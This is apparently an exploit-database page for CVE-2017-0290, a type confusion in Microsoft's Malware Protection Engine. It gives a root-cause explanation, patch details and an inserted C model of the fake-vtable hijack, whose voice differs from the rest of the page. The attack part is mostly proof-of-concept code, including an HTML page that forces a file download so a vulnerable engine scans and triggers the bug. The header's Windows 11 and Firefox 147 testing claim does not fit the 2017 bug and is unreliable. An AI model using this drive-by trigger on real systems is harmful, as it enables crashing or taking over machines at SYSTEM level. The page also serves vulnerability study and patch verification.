## https://sploitus.com/exploit?id=PACKETSTORM:218608
==================================================================================================================================
    | # Title     : Microsoft Malware Protection Engine Type Confusion Leading to SYSTEM-Level RCE                                   |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |
    | # Vendor    : https://www.microsoft.com/fr-dz                                                                                  |
    ==================================================================================================================================
    
    [+] Summary    : CVE-2017-0290 is a critical type confusion vulnerability in the Microsoft Malware Protection Engine (mpengine.dll, hosted by the MsMpEng.exe service) that lets a remote attacker execute arbitrary code as NT AUTHORITY\SYSTEM.
                     It is reached with little or no user interaction: the engine scans content as it arrives, so a crafted file delivered by a web page, an e-mail message or a download is enough to trigger it; the victim never has to open the file.
                     The root cause is in the JavaScript interpreter the engine uses to emulate scripts found in scanned content. Its implementation of Error.prototype.toString() assumes this.message is a string object and uses it without checking its type, so an integer stored there is handled as if it were an object reference.
                     The misinterpreted memory gives the attacker influence over internal pointers such as the object's vtable pointer.
                     On an unpatched engine, scanning the proof of concept produces an access violation (exception code 0xC0000005) in MsMpEng.exe; with attacker-controlled memory behind the confused value, the same bug can be turned into control of execution and full system compromise.
    
    [+] Key Risk Factors :
    
    Remote code execution (RCE)
    Runs as NT AUTHORITY\SYSTEM (at the time the engine service ran unsandboxed with SYSTEM privileges)
    Enabled by default: real-time protection scans new files without any user action or special configuration
    Multiple delivery vectors (web page, e-mail, file download or shared folder)
    Hard to filter at the perimeter: the engine unpacks and emulates many file formats, so the trigger can be embedded in many container types
    
    [+] Technical Explanation :
    
    Error.prototype.toString() reads this.message and expects it to be a string object.
    The attacker's script supplies an integer instead (for example message: 12345, or a chosen value such as 0x41414111 >> 1).
    In vulnerable engine versions the interpreter does not check the type before using the value, which leads to:
    Type confusion: the integer's bits are treated as an object reference
    Invalid memory access: the interpreter reads an object header, including the vtable pointer, from an address derived from attacker data
    Crash (access violation) when that address is unmapped; if the attacker controls the memory at that address, control of execution instead
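The following C program is an added illustration of the bug class described above; it is not mpengine code and not the original author's PoC. It models a tiny tagged-value interpreter in which a JavaScript value is either an integer or a pointer to a string object whose first word is a vtable pointer. The object layout, the tag names and the vtable shape are assumptions made for the demonstration (the page's `0x41414111 >> 1` hints that the real engine stores small integers shifted by one bit; the model uses an explicit tag field instead for clarity). The vulnerable `toString` uses the pointer member of the union without checking the tag, so an integer `message` whose bits equal the address of an attacker-controlled block makes the interpreter call through the attacker's fake vtable; the fixed version checks the tag and coerces with ToString.

```c
/* Added illustration of the bug class behind CVE-2017-0290: a toString that
 * trusts `this.message` to be a string object. Hypothetical tagged-value
 * model only; NOT the mpengine implementation. Layout, tags and vtable shape
 * are assumptions for demonstration. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

struct JSString;

/* Assumed vtable: behaviour is reached through a pointer in the object header. */
struct StringVTable {
    size_t (*length)(const struct JSString *);
    const char *(*chars)(const struct JSString *);
};

struct JSString {
    const struct StringVTable *vt;   /* first word: vtable pointer */
    const char *data;
    size_t len;
};

enum Tag { TAG_INT, TAG_STRING };

/* A JS value: an integer or a pointer to a string object. Only the tag says
 * which union member is meaningful. */
struct Value {
    enum Tag tag;
    union { intptr_t i; struct JSString *s; } u;
};

static size_t str_length(const struct JSString *s) { return s->len; }
static const char *str_chars(const struct JSString *s) { return s->data; }
static const struct StringVTable string_vtable = { str_length, str_chars };

/* Vulnerable model: uses the pointer member without checking the tag. If the
 * script stored an integer (message: 12345), its bits become an object
 * address and the first word found there is trusted as the vtable pointer. */
static void error_tostring_vulnerable(struct Value msg, char *out, size_t n) {
    struct JSString *s = msg.u.s;                        /* no tag check */
    snprintf(out, n, "Error: %.*s", (int)s->vt->length(s), s->vt->chars(s));
}

/* Fixed model: check the tag and apply ToString to non-string values, so the
 * pointer member is only dereferenced when it really holds a string object. */
static void error_tostring_fixed(struct Value msg, char *out, size_t n) {
    if (msg.tag == TAG_STRING) {
        struct JSString *s = msg.u.s;
        snprintf(out, n, "Error: %.*s", (int)s->vt->length(s), s->vt->chars(s));
    } else {
        snprintf(out, n, "Error: %ld", (long)msg.u.i);
    }
}

/* Attacker side of the model: a fake string object whose vtable points at
 * attacker-chosen functions. A real exploit would have to place this at a
 * predictable address (heap spray etc.); here the address is simply known,
 * so the control-flow hijack is deterministic and harmless. */
static int gadget_hits;
static size_t evil_length(const struct JSString *s) { (void)s; gadget_hits++; return 5; }
static const char *evil_chars(const struct JSString *s) { (void)s; return "PWNED"; }
static const struct StringVTable evil_vtable = { evil_length, evil_chars };

static char outbuf[64];

/* Integer-tagged message whose bits point at the fake object: the vulnerable
 * path calls through the attacker's vtable. Returns the number of gadget calls. */
int run_vulnerable_with_fake_object(void) {
    struct JSString fake = { &evil_vtable, "PWNED", 5 };
    struct Value v = { TAG_INT, { .i = (intptr_t)&fake } };
    gadget_hits = 0;
    error_tostring_vulnerable(v, outbuf, sizeof outbuf);
    return gadget_hits;
}

/* Same integer-tagged message through the fixed path: coerced, never dereferenced. */
const char *run_fixed_with_integer(long value) {
    struct Value v = { TAG_INT, { .i = (intptr_t)value } };
    error_tostring_fixed(v, outbuf, sizeof outbuf);
    return outbuf;
}

/* Well-typed message: both versions produce the same text, which is why the
 * missing check is easy to overlook in testing. Returns 1 if they agree. */
int run_both_with_string(const char *text) {
    char a[64], b[64];
    struct JSString real = { &string_vtable, text, strlen(text) };
    struct Value v = { TAG_STRING, { .s = &real } };
    error_tostring_vulnerable(v, a, sizeof a);
    error_tostring_fixed(v, b, sizeof b);
    return strcmp(a, b) == 0;
}

int main(void) {
    printf("fixed, integer message : %s\n", run_fixed_with_integer(12345));
    printf("well-typed, both agree : %d\n", run_both_with_string("boom"));
    printf("vulnerable, fake object: gadget calls = %d, output = %s\n",
           run_vulnerable_with_fake_object(), outbuf);
    return 0;
}
```

The point of the model is the last line of output: nothing in the attacker's input is executable, yet an indirect call lands in attacker-chosen code purely because one type check is missing on a value the script controls. The fix is the tag check, not any change to the call site.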
    
    [+] Patch Information : Reported by Natalie Silvanovich and Tavis Ormandy of Google Project Zero and fixed by Microsoft in an out-of-band engine update released on May 8, 2017 (Microsoft Security Advisory 4022344). The first engine version with the fix is 1.1.13704.0; the engine updates itself through the normal definition-update channel, so most systems received it automatically. To verify, check that the engine version reported by Get-MpComputerStatus (AMEngineVersion) is 1.1.13704.0 or later.
    
    [+] POC   :  (the trigger is script text inside content that the engine scans; executing this in a browser or Node.js only shows the benign, spec-conformant result "Error: 12345", because those engines coerce message with ToString)
    
    function demoTypeConfusion() {
        try {
            // An object whose `message` is an integer rather than a string.
            var fakeObject = {
                message: 12345
            };
    
            // Invoke Error.prototype.toString with the integer-bearing object as `this`.
            // A vulnerable engine uses `message` as a string object without a type check.
            var result = Error.prototype.toString.call(fakeObject);
    
            console.log("Result:", result);
        } catch (e) {
            console.log("Error triggered:", e.message);
        }
    }
    
    demoTypeConfusion();
    	
    HTML POC (the browser executing this page is not the target; a vulnerable engine evaluates the script when the page or the downloaded testcase.txt, a companion file not reproduced here, is written to disk and scanned)
    
    <!DOCTYPE html>
    <html>
    <head>
        <title>CVE-2017-0290 PoC</title>
    </head>
    <body>
        <h1>Proof of Concept - CVE-2017-0290</h1>
        <p>Scanning this file with a vulnerable engine crashes MsMpEng.exe</p>
        
        <a href="testcase.txt" download id="exploitLink">download</a>
        
        <script>
    
            function triggerExploit() {
                // Attacker-chosen integer; the >> 1 accounts for the engine's
                // internal integer representation so the stored bits are controlled.
                var controlledValue = 0x41414111 >> 1;
                // `message` holds an integer, not a string.
                var maliciousObject = {
                    message: controlledValue
                };
                // Error.prototype.toString is invoked with the integer-bearing
                // object as `this`; a vulnerable engine trusts `message` as a string object.
                (new Error()).toString.call(maliciousObject);
            }
            // Start the download so the companion file reaches the disk and gets scanned.
            document.getElementById("exploitLink").click();
    
            setTimeout(triggerExploit, 100);
        </script>
    </body>
    </html>
    
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================